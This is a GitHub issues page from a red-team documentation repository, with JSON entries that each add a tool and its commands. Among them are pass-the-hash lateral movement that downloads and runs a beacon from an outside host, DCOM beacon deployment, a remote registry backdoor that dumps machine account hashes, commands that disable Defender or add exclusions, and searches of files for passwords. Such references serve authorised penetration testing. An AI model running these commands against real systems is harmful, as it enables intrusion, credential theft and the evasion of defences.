patrick-de / rtt-docs Goto Github PK
View Code? Open in Web Editor NEWPublic repository for the techniques and tools shown on rtt.secdu.de
License: GNU Affero General Public License v3.0
rtt-docs's People
Contributors
Stargazers
Watchers
rtt-docs's Issues
New tool: crackmapexec
{
"name": "crackmapexec",
"phases": [
"07. Lateral Movement",
"08. Credentials & User Impersonation",
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://github.com/byt3bl33d3r/CrackMapExec",
"description": "CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of \"Living off the Land\": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.",
"undetected": [],
"detected": [],
"content": "# Crackmapexec\n\n## Deploy custom beacon\ncrackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"curl -o C:\\Windows\\Temp\\pivot.exe http://172.29.137.67:8081/pivot.exe\"\ncrackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"powershell.exe Invoke-Command -ScriptBlock {C:\\Windows\\Temp\\pivot.exe}\"\n\n## Test multipe credentials\n'''sh\n#Pattern: (.*):(.*):(.*):(.*):::\n#Replacement: crackmapexec smb 172.29.139.180 -u $1 -H $4 -x whoami\ncrackmapexec smb 172.29.139.180 -u <USER> -H <NTLM> -x whoami\n'''\n\n## [[Guest Access (SMB)]]\nEnumerate null sessions\n>cme smb <ip> -u '' -p '' \n\nEnumerate Anonymous access\n>cme smb <ip> -u 'a' -p ''\n\n## [[SMB Signing]]\nChecking for SMB signing\n\n## [[User enum]]\n>cme smb <ip> -u <user> -p '<password>' --users\n\n## [[Shares]]\n* Enumerate smb hosts \n>cme smb <ip_range>\n\n",
"commands": [
{
"id": "cba65b8b-1f83-467a-8608-4e3965340652",
"name": "Run command via SMB",
"description": "For example deploying a beacon via SMB",
"tag": "",
"results": [
"EXECUTION:REMOTE"
],
"cmd": "crackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"curl -o C:\\Windows\\Temp\\pivot.exe http://172.29.137.67:8081/pivot.exe\"\ncrackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"powershell.exe Invoke-Command -ScriptBlock {C:\\Windows\\Temp\\pivot.exe}\"",
"requirements": {
"and": [
{
"tag": "CRED:HASH"
},
{
"tag": "SERVICE:SMB"
},
{
"tag": "PRIVS:ADMIN"
}
]
}
},
{
"id": "624a21de-3375-4b68-868a-a6408521ce6b",
"name": "Enumerate null / anon sessions",
"description": "",
"tag": "",
"results": [],
"cmd": "cme smb <ip> -u '' -p ''\ncme smb <ip> -u 'a' -p ''"
},
{
"id": "641aee06-bfb3-41db-b032-58eb372f4b5c",
"name": "Remote user enumeration",
"description": "",
"tag": "",
"results": [],
"cmd": "cme smb <ip> -u <user> -p '<password>' --users"
},
{
"id": "9572ef78-24b0-4515-9fda-cd273050ae01",
"name": "Enumerate smb hosts",
"description": "",
"tag": "",
"results": [],
"cmd": "cme smb <ip_range>"
}
],
"references": [
"https://wiki.porchetta.industries/"
]
}
New tool: Active Directory Service Interface
{
"name": "Active Directory Service Interface",
"phases": [
"06. Domain Enumeration"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://learn.microsoft.com/de-de/windows/win32/adsi/active-directory-service-interfaces-adsi",
"description": "Active Directory Service Interfaces (ADSI) ist eine Reihe von COM-Schnittstellen, die verwendet werden, um auf die Features von Verzeichnisdiensten aus verschiedenen Netzwerkanbietern zuzugreifen.",
"undetected": [],
"detected": [],
"commands": [
{
"id": "d53c8ab4-60b8-4a7c-bd0a-5b9215366d4d",
"name": "Get Domain Controller",
"description": "",
"tag": "",
"results": [
"INTEL:DOMAIN:DC"
],
"cmd": "[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers",
"requirements": {
"tag": "S"
}
},
{
"id": "0513b338-00d6-40f6-9e27-e955c0faf923",
"name": "Enumerate Remote Users",
"description": "",
"tag": "",
"results": [
"INTEL:DOMAIN:USERS"
],
"cmd": "([ADSI]'WinNT://<computer>/Administrators').psbase.Invoke('Members') | %{$_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)}",
"requirements": {
"and": [
{
"tag": "SERVICE:SMB"
},
{
"tag": "COMPUTER:CONFIG:REMOTEMANAGEMENT"
},
{
"or": [
{
"tag": "COMPUTER:IP"
},
{
"tag": "COMPUTER:HOSTNAME"
}
]
}
]
}
}
],
"content": "",
"references": []
}
New tool: Invoke-DCOM
"name": "Invoke-DCOM",
"phases": [
"01. Initial Access",
"07. Lateral Movement"
],
"category": "",
"stealthy": false,
"oss": [
"Windows"
],
"source": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1",
"description": "Lateral Move via DCOM.",
"undetected": [],
"detected": [],
"content": "# Invoke-DCOM\n\n## [[DCOM]]\n'''\nImport-Module .\\Invoke-DCOM.ps1\nInvoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"\n'''\n\nTo interact over Distributed Component Object Model (DCOM), we must use an external tool such as [[Invoke-DCOM]].\n''''''beacon\nbeacon> powershell-import C:\\Tools\\Invoke-DCOM.ps1\nbeacon> powershell Invoke-DCOM -ComputerName srv1 -Method MMC20.Application -Command C:\\Windows\\beacon-smb.exe\nCompleted\n\nbeacon> link srv1\n[+] established link to child beacon: 10.10.1.20\n''''''\n\nDCOM is more complicated to detect, since each \"Method\" works in a different way. In the particular case of 'MMC20.Application', the spawned process will be a child of 'mmc.exe'.\n\n''''''\nProcessId: 952\nImage: C:\\Windows\\beacon-smb.exe\nParentImage: C:\\Windows\\System32\\mmc.exe\n'''''' \nProcesses started via DCOM may also be seen where the parent is 'svchost.exe' (started with the command line '-k DcomLaunch').\n\n",
"commands": [
{
"id": "cfb6398e-d128-41e6-8e25-9f3effdcf564",
"name": "Import",
"description": "Import module",
"tag": "",
"results": [],
"cmd": "Import-Module .\\Invoke-DCOM.ps1"
},
{
"id": "ffd4d5ff-e7cf-4621-b07d-f69d9687b635",
"name": "Execute command via MMC20.Application",
"description": "Svchost spawns mmc.exe which opens a listening port via RPC binding",
"tag": "",
"results": [],
"cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\""
},
{
"id": "ded4b315-b2e7-435b-bb11-d21234a1b32c",
"name": "Execute command via ExcelDDE",
"description": "",
"tag": "",
"results": [],
"cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\""
},
{
"id": "16dee6f1-13c1-4e1c-a5e1-52a17830506b",
"name": "Execute command via ServiceStart ",
"description": "",
"tag": "",
"results": [],
"cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\""
}
]
}```
New tool: C2concealer
"name": "C2concealer",
"phases": [
"00. Infrastructure"
],
"category": "",
"stealthy": false,
"oss": [
"Linux"
],
"source": "https://github.com/FortyNorthSecurity/C2concealer",
"description": "C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.",
"undetected": [],
"detected": [],
"content": "\n\n## [[Cobalt Strike]]\n\n",
"commands": [
{
"id": "8e0dc6a7-a1fc-4a1e-ac0f-0dfe239cd961",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "chmod u+x install.sh\n./install.sh"
},
{
"id": "faac6737-b5fa-419c-b71a-2be384f8743f",
"name": "Generate malleable profile",
"description": "Generate malleable profile with 3 HTTP client/server variants",
"tag": "",
"results": [],
"cmd": "C2concealer --hostname google.com --variant 3"
}
]
}```
New tool: LyncSniper
{
"name": "LyncSniper",
"phases": [
"02. Reconnaissance"
],
"category": "OSINT",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/0x802/LinkSniper",
"description": "It takes all links from target, if the link belongs to a target like subdomain, then it will work on it. If there was another field, it wouldn't add it to the output, and this process continues until the links map is complete",
"undetected": [],
"detected": [],
"content": "\n## [[Exposed Machines]]\n\n",
"commands": [
{
"id": "79bfc7a5-811d-4d7c-a097-b5ec220bd1a0",
"name": "Spider or repeater to find all links in website.",
"description": "",
"tag": "",
"results": [
"INTEL:WEB:LINKS"
],
"cmd": "python3 LinkSniper.py https://www.google.com\n"
}
]
}
New tool: Add-RemoteRegBackdoor
{"name":"Add-RemoteRegBackdoor","phases":["08.Credentials & User Impersonation"],"category":"","stealthy":false,"oss":["Windows"],"source":"https://github.com/HarmJ0y/DAMP/blob/master/Add-RemoteRegBackdoor.ps1","description":"Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash.","undetected":[],"detected":[],"content":"\n## [[Remote Registry]]\n'Add-RemoteRegBackdoor' can be run locally on a compromised machine, or remotely with credentials.\n'''beacon\nbeacon> run hostname\nsrv2\n\nbeacon> getuid\n[*] You are NT AUTHORITY\\SYSTEM (admin)\n\nbeacon> powershell Add-RemoteRegBackdoor -Trustee EDU\\john\nComputerName BackdoorTrustee\n------------ ---------------\nSRV2 EDU\\john\n'''\n\n'''beacon\nbeacon> getuid\n[*] You are EDU\\john\n\nbeacon> ls \\\\srv2\\c$\n[-] could not open \\\\srv2\\c$\\*: 5\n\nbeacon> powershell Get-RemoteMachineAccountHash -ComputerName srv2\n\nComputerName MachineAccountHash \n------------ ------------------ \nsrv2 5d0d485386727a8a92498a2c188627ec\n'''\n\n\n","commands":[{"id":"707832f8-a129-4e7c-a159-ef62d11bb1e5","name":"Add-RemoteRegBackdoor","description":"Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash.","cmd":"powershell Add-RemoteRegBackdoor -Trustee EDU\\john","tag":"GatherAccountHashBackdoor","requirements":[{"name":"Admin","category":"Credentials","exists":true}],"results":[{"name":"MachineAccountHash","category":"Credentials","exists":true}]},{"id":"3ad621d5-334d-47e2-9106-0d63b909090e","name":"Add-RemoteRegBackdoor#2","description":"Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash.","cmd":"powershell Add-RemoteRegBackdoor -Trustee EDU\\john","tag":"GatherAccountHashBackdoor","requirements":[{"name":"Admin","category":"Credentials","exists":true}],"results":[{"name":"MachineAccountHash","category":"Credentials","exists":true}]}],"path":"tools/Add-RemoteRegBackdoor.md"}
New tool: Amass
{
"name": "Amass",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Cross platforms (GO)"
],
"source": "https://github.com/owasp-amass/amass",
"description": "The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.",
"undetected": [],
"detected": [],
"content": "\n## [[Exposed Machines]]\nScan for external machines\n\n",
"commands": [
{
"id": "3d58a22c-e1ee-41b2-9c68-5a64efba043b",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "wget https://github.com/owasp-amass/amass/releases/latest"
}
]
}
New tool: John the Ripper
{
"name": "John the Ripper",
"phases": [
"02. Reconnaissance",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://www.openwall.com/john/",
"description": "John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.",
"undetected": [],
"detected": [],
"content": "# John the Ripper\n\n\n## [[Crack Credentials]]\nCracking netntlmv2\n'''sh\n--format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2\n'''\n\n\n",
"commands": [
{
"id": "ff58951f-1f3f-4ba1-b0de-a11fe3a78740",
"name": "Cracking netntlmv2",
"description": "",
"tag": "",
"results": [],
"cmd": "john --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2"
}
]
}
New tool: donut
"name": "donut",
"phases": [
"10. Bypassing Defenses"
],
"category": "",
"stealthy": false,
"oss": [
"Windows",
"Linux"
],
"source": "https://github.com/TheWover/donut",
"description": "Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters",
"undetected": [],
"detected": [],
"commands": [
{
"id": "ab7ad162-8447-47b9-94ea-2f4d7273afef",
"name": "Create shellcode of .NET assembly",
"description": "Create shellcode of .NET assembly",
"tag": "",
"results": [],
"cmd": "donut.exe -i MyAssembly.exe -c MyAssembly.Program"
}
],
"content": ""
}```
New tool: Chameleon
"name": "Chameleon",
"phases": [
"00. Infrastructure",
"06. Domain Enumeration"
],
"category": "",
"stealthy": false,
"oss": [
"Python"
],
"source": "https://github.com/mdsecactivebreach/Chameleon",
"description": "A tool for domain categorisation",
"undetected": [],
"detected": [],
"content": "\n## [[Categorize Domain]]\n\n⚠️ When attempting to categorise a site in Bluecoat, do not check the category first otherwise it will end up uncategorised! Individual hosts can however be categorised differently.\n\n'''\nusage: chameleon.py [-h] [--proxy <proxy>] [--check] [--submit]\n [--domain <domain>]\n\noptional arguments:\n -h, --help show this help message and exit\n --proxy <proxy> Proxy type: a = all, b = bluecoat, m = mcafee, i = IBM\n Xforce\n --check Perform check on current category\n --submit Submit new category\n --domain <domain> Domain to validate\n'''\n\n\n",
"commands": [
{
"id": "3a3033f5-5477-4e80-b39c-242e4c529e4b",
"name": "Check categorization",
"description": "Check categorization for Bluecoat, McAfee Trustedsource and IBM X-Force",
"tag": "",
"results": [],
"cmd": "python chameleon.py --proxy a --check --domain google.com"
},
{
"id": "db1ceb93-65c0-4b1e-80d3-c0ae724e4914",
"name": "Submit categorization",
"description": "Submit categorization to Bluecoat, McAfee Trustedsource and IBM X-Force",
"tag": "",
"results": [],
"cmd": "python chameleon.py --proxy a --submit --domain google.com"
}
]
}```
New tool: ADExplorerSnapshot
"name": "ADExplorerSnapshot",
"phases": [
"06. Domain Enumeration"
],
"category": "",
"stealthy": false,
"oss": [
"Python"
],
"source": "https://github.com/c3c/ADExplorerSnapshot.py",
"description": "ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound, and also supports full-object dumping to NDJSON.",
"undetected": [],
"detected": [],
"commands": [
{
"id": "e3e497fc-1857-460a-a33d-3969a0a8de07",
"name": "Snapshot to bloodhound",
"description": "Transform snapshot to bloodhound zip",
"tag": "",
"results": [
"INTEL:DOMAIN:COMPUTERS",
"INTEL:DOMAIN:DOMAINS",
"INTEL:DOMAIN:GPOS",
"INTEL:DOMAIN:GROUPS",
"INTEL:DOMAIN:SID",
"INTEL:DOMAIN:TRUSTS",
"INTEL:DOMAIN:USERS"
],
"cmd": "python ADExplorerSnapshot.py -o bhzip /mnt/c/Users/patri/Downloads/projects/bloodhound-import/install_temp.log",
"requirements": {
"tag": "ADExplorer:Snapshot"
}
}
],
"content": ""
}```
New tool: EyeWitness
{
"name": "EyeWitness",
"phases": [
"02. Reconnaissance",
"06. Domain Enumeration"
],
"category": "",
"stealthy": false,
"platforms": [
"Python",
"Windows"
],
"source": "https://github.com/FortyNorthSecurity/EyeWitness",
"description": "EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known.",
"undetected": [],
"detected": [],
"content": "This is tool capable of identifying (and taking screenshots of) web apps from a list of targets.\n\n## [[Find Web Server]]\nLocal Scan (does not work)\n>./EyeWitness.py --localscan 192.168.1.0/24\n\nScan with multiple IPs received from NMAP\n'''sh\ncat /root/targets.txt\n10.10.17.71\n10.10.1.20\n10.10.17.68\n\nproxychains4 ./EyeWitness.py --web -f /root/targets.txt -d /root/edu --no-dns --no-prompt\n\nStarting Web Requests (3 Hosts)\nAttempting to screenshot http://10.10.17.71\n[*] WebDriverError when connecting to http://10.10.17.71\nAttempting to screenshot http://10.10.1.20\n[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.1.20:80 ... OK\nAttempting to screenshot http://10.10.17.68\n[*] WebDriverError when connecting to http://10.10.17.68\nFinished in 12.967030048370361 seconds\n'''\n\n",
"commands": [
{
"id": "f859e696-2096-4bbe-8a8f-1164b0d99f7a",
"name": "Scan IP's from file",
"description": "",
"tag": "",
"results": [],
"cmd": "proxychains4 ./EyeWitness.py --web -f /root/targets.txt -d /root/edu --no-dns --no-prompt\n"
}
]
}
New tool: dig
{
"name": "dig",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://linux.die.net/man/1/dig",
"description": "DNS lookup utility\n\ndig @nameserver name recordtype\n\ne.g.\n\ndig @1.1.1.1 myevildoma.in A\n\nVia SOCKS proxy:\nUse +tcp and +vc options to perform DNS requests via TCP.\n",
"undetected": [],
"detected": [],
"content": "",
"commands": [
{
"id": "7c296daf-1dda-4811-bdfe-0f74b2d7ee29",
"name": "Query A record",
"description": "",
"tag": "",
"results": [],
"cmd": "dig @nameserver name recordtype\ndig @1.1.1.1 apple.com A"
},
{
"id": "c16ec93a-68d6-4de4-9e40-ea23377b9d2d",
"name": "Get Domain Controller (Global Catalog) ",
"description": "Look up the Windows global catalog (GC) record and the authoritative domain server record to determine domain controller addresses",
"tag": "",
"results": [],
"cmd": "dig _gc. <domain>",
"requirements": {
"tag": "INTEL:DOMAIN:DOMAINS"
}
},
{
"id": "d4866eaf-525f-47b1-9412-c9037706bada",
"name": "Server NS query",
"description": "",
"tag": "",
"results": [],
"cmd": "dig -t NS <domain>"
}
]
}
New tool: SauronEye
{ "name": "SauronEye", "phases": [ "03. Host Enumeration", "06. Domain Enumeration", "02. Reconnaissance" ], "category": "", "stealthy": false, "oss": [ "Windows" ], "source": "https://github.com/vivami/SauronEye", "description": "Search tool to find specific files containing specific words, i.e. files containing passwords..", "undetected": [ "Windows Defender (AV)", "MDE" ], "detected": [], "commands": [ { "id": "79bf0a10-5f2b-4194-b826-f79599092a9c", "name": "Find passwords in files", "description": "Find passwords in files", "tag": "", "results": [], "cmd": "SauronEye.exe -d C:\\ --filetypes .txt .ps1 .vba .conf .ini --contents --keywords password pass* -v" }, { "id": "157a585d-9c1e-46ac-a530-e5dc70f4e7ab", "name": "Find filesnames containing keywords", "description": "Find filesnames containing keywords", "tag": "", "results": [], "cmd": "SauronEye.exe -d C:\\ --filetypes .txt .ps1 .vba .conf .ini --keywords password pass* -v" } ], "content": "" }
New tool: MSBuild
{
"name": "MSBuild",
"phases": [
"03. Host Enumeration",
"04. Persistence"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "lolbas",
"description": "MSBuild.exe is preinstalled on various version of the Windows operating system and can be found in \"%WINDIR%\\Framework\\<NET-Version>\\MSBuild.exe\" (and Framework64 for x64 operating systems). It can be abused to execute arbitrary C# code using BuildTasks. ",
"undetected": [],
"detected": [],
"commands": [
{
"id": "2e0f58d8-11cb-43db-a8ba-e797def0a915",
"name": "Execute arbitrary build script",
"description": "Executes an arbitrary build script",
"tag": "",
"results": [],
"cmd": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe \"C:\\Users\\ev1l\\Desktop\\my-project.xml\""
}
],
"content": ""
}
New tool: dig
{
"name": "dig",
"phases": [
"02. Reconnaissance"
],
"requirements": [],
"results": [],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://linux.die.net/man/1/dig",
"description": "DNS lookup utility\n\ndig @nameserver name recordtype\n\ne.g.\n\ndig @1.1.1.1 myevildoma.in A\n\nVia SOCKS proxy:\nUse +tcp and +vc options to perform DNS requests via TCP.\n",
"undetected": [],
"detected": [],
"content": "",
"commands": [
{
"id": "7c296daf-1dda-4811-bdfe-0f74b2d7ee29",
"name": "Server NS query",
"description": "",
"tag": "",
"results": [],
"cmd": "dig @nameserver name recordtype\ndig @1.1.1.1 apple.com A"
}
]
}
New tool: spoofcheck
{
"name": "spoofcheck",
"phases": [
"01. Initial Access",
"08. Credentials & User Impersonation"
],
"category": "OSINT",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/BishopFox/spoofcheck",
"description": "Simple script that checks a domain for email protections",
"undetected": [],
"detected": [],
"content": "\n## [[Internal Phishing]][[Phishing]]\nSimple script that checks a domain for email protections.\n\n",
"commands": [
{
"id": "b0c14789-9e82-4c39-9975-da3eafe934ca",
"name": "Check SPF and DMARC records",
"description": "",
"tag": "",
"results": [],
"cmd": "./spoofcheck.py [DOMAIN]"
},
{
"id": "5e49afdc-8e7d-4ffe-b112-584176053a63",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "git clone https://github.com/BishopFox/spoofcheck.git\npip install -r requirements.txt"
}
]
}
New tool: Cewl
"name": "Cewl",
"phases": [
"01. Initial Access"
],
"category": "",
"stealthy": false,
"oss": [
"Linux"
],
"source": "https://github.com/digininja/CeWL",
"description": "Password list generator",
"undetected": [],
"detected": [],
"content": "# Cewl\n\n## [[Password Spraying]]\nSpider and build dictionary\n'''\ncewl -w createWordlist.txt https://www.example.com\n'''\n\nAdd minimum password length:\n'''\ncewl -w createWordlist.txt -m 6 https://www.example.com\n'''\n\n\n",
"commands": [
{
"id": "f715c0ee-840f-481c-9999-e8dc102ea5cc",
"name": "Build dict from web",
"description": "Spider and build dictionary from website",
"tag": "",
"results": [],
"cmd": "cewl -w createWordlist.txt https://www.example.com"
},
{
"id": "ba34fd28-316f-4d8c-99a2-464b6f5e03e4",
"name": "Build dict from web min pw length",
"description": "Spider and build dictionary from website with a minimum password length",
"tag": "",
"results": [],
"cmd": "cewl -w createWordlist.txt -m 6 https://www.example.com"
}
]
}```
New tool: PowerShell
{
"name": "PowerShell",
"phases": [
"01. Initial Access",
"03. Host Enumeration",
"04. Persistence",
"05. Privilege Escalation",
"07. Lateral Movement"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://learn.microsoft.com/de-de/powershell/?view=powershell-7.3",
"description": "PowerShell",
"undetected": [],
"detected": [],
"content": "\n\n## [[LSA Protection]]\n`Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }`\n\n## [[RDP]]\n`Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap`\n\n## [[COM Hijacking]]\nList COM objects\n`gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32`\n\nList COM Object Methods for WScript.Shell.1\n`$o = [activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm`\n\n## [[Unquoted Service Path]]\nGet ACLs of services\n```ps\npowershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl\n \nPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\Vuln Services\nOwner : BUILTIN\\Administrators\nGroup : wkstn1\\None\nAccess : CREATOR OWNER Allow FullControl\n NT AUTHORITY\\SYSTEM Allow FullControl\n BUILTIN\\Administrators Allow FullControl\n BUILTIN\\Users Allow Write, ReadAndExecute, Synchronize\n NT SERVICE\\TrustedInstaller Allow FullControl\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize\n```\n\n## [[Common Language Runtime (CLR) Versions]]\n```ps\ndir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")\n```\n\n",
"commands": [
{
"id": "6183749c-eee5-42ca-a171-ac1b1a35a449",
"name": "Check LSA Protection",
"description": "",
"tag": "",
"results": [],
"cmd": "Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }"
},
{
"id": "cc43d2fa-b951-4f09-b37f-91f34ea5bbaf",
"name": "Get RDP Events",
"description": "",
"tag": "",
"results": [],
"cmd": "Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap"
},
{
"id": "bf3b2a29-c697-4835-aadd-02cf9a14dcbc",
"name": "List all COM objects via wmi",
"description": "A lot of output",
"tag": "",
"results": [],
"cmd": "gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32"
},
{
"id": "e6685b82-4fa3-4591-bc80-732a64a8cc28",
"name": "List methods of COM object ",
"description": "List COM Object Methods for WScript.Shell.1",
"tag": "",
"results": [],
"cmd": "[activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm"
},
{
"id": "48b78655-db1f-4da0-9d31-f90cc810eb3e",
"name": "Get ACLs of services",
"description": "",
"tag": "",
"results": [],
"cmd": "powershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl"
},
{
"id": "5c9766c7-293d-4110-bfeb-0aabfd061080",
"name": "Get CLR versions",
"description": "Get Common Language Runtime (CLR) versions",
"tag": "",
"results": [],
"cmd": "cmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")"
},
{
"id": "a8516fd7-ce4f-4c19-97c9-780aa299f594",
"name": "Disable Defender",
"description": "",
"tag": "",
"results": [],
"cmd": "Set-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableBehaviorMonitoring $true\nSet-MpPreference -DisableScriptScanning $true\nSet-MpPreference -DisableArchiveScanning $true",
"requirements": {
"tag": "PRIVS:ADMIN"
}
},
{
"id": "4e5c3ef8-0775-4d8e-af57-a82dc066e524",
"name": "Get Defender Status",
"description": "",
"tag": "",
"results": [],
"cmd": "Get-MpComputerStatus\nGet-MpPreference"
},
{
"id": "c6a72c8f-0734-4a95-9dfd-241ac41591b5",
"name": "Defender Exclusions",
"description": "",
"tag": "",
"results": [],
"cmd": "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath\n\nSet-MpPreference -ExclusionPath PATH\\TO\\FOLDER\nSet-MpPreference -ExclusionExtension docx\nSet-MpPreference -ExclusionProcess Process",
"requirements": {
"tag": "PRIVS:ADMIN"
}
},
{
"id": "52121667-91db-4042-910a-ae02121b82f3",
"name": "Get Defender Detections",
"description": "",
"tag": "",
"results": [],
"cmd": "Get-MpThreatDetection"
}
]
}
New tool: Collector
{
"name": "Collector",
"phases": [
"02. Reconnaissance"
],
"category": "OSINT",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://github.com/galihap76/collector",
"description": "Collector is a OSINT tool and information gathering. This tool can do information gathering phone numbers, github account, ip address and instagram account.",
"undetected": [],
"detected": [],
"content": "\n## [[Passive Reconnaissance]]\n\n",
"commands": [
{
"id": "955ce93e-932e-4e5b-8e7a-8918611697dc",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "git clone https://github.com/galihap76/collector.git\ncd collector \npip install -r requirements.txt\npython3 main.py --update"
},
{
"id": "4875efe7-41e8-4700-b6eb-5413570b57b1",
"name": "Get info via IP",
"description": "",
"tag": "",
"results": [],
"cmd": "python3 main.py -i <ip address>",
"requirements": {
"tag": "INTE"
}
},
{
"id": "87e07916-e228-4131-b0ee-d6112b46b00f",
"name": "Get info via Instagram",
"description": "",
"tag": "",
"results": [],
"cmd": "python3 main.py --login -u <YOUR USERNAME> -p <YOUR PASSWORD>\npython3 main.py -ig <target username>"
}
]
}
New tool: ADExplorer
"name": "ADExplorer",
"phases": [
"06. Domain Enumeration"
],
"category": "",
"stealthy": false,
"oss": [
"Windows"
],
"source": "https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer",
"description": "Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute.",
"undetected": [
"Windows Defender (AV)",
"MDE",
"Symantec"
],
"detected": [],
"commands": [
{
"id": "5c9c5c1b-543f-4a9e-84d3-dd7b75089cb2",
"name": "Snapshot of full domain ",
"description": "Snapshot of full domain, between the \" \" you can specify a target domain",
"tag": "",
"results": [],
"cmd": "ADExplorer.exe -snapshot \"\" outfile.dat"
},
{
"id": "2054d057-9098-4d0c-86c6-97b6fa0d6fb3",
"name": "Snapshot of full domain from external SMB share",
"description": "Snapshot of full domain from external SMB share, between the \" \" you can specify a target domain",
"tag": "",
"results": [],
"cmd": "\\\\live.sysinternals.com\\Tools\\ADExplorer.exe -snapshot \"\" <domain_snapshot.dat>\n"
}
],
"content": ""
}```
New tool: ldapsearch
{
"name": "ldapsearch",
"phases": [
"02. Reconnaissance",
"08. Credentials & User Impersonation"
],
"category": "Enumeration",
"stealthy": true,
"platforms": [
"Linux"
],
"source": "https://linux.die.net/man/1/ldapsearch",
"description": "Allows you to specify custom LDAP queries",
"undetected": [],
"detected": [],
"content": "# ldapsearch\n\n## [[Validate Credentials]]\n1. Get [[Domain Controller]]\n2. Login\n '.\\\\ldapsearch.exe -x -h 127.0.0.1 -b dc=maxcrc,dc=com -w PW -D \"cn=admin\"'\n\n3. Flags\n * x: anonymous connect\n * h: server\n * b: root (domain component)\n * w: password\n * W: interactive password\n * D: binddn - user\n\n## [[User enum]]\n> ldapsearch -x -h <ip> -s base\n\n",
"commands": [
{
"id": "f3f95224-0c24-4a55-8c3b-4fea8d7ae490",
"name": "Login",
"description": "",
"tag": "",
"results": [],
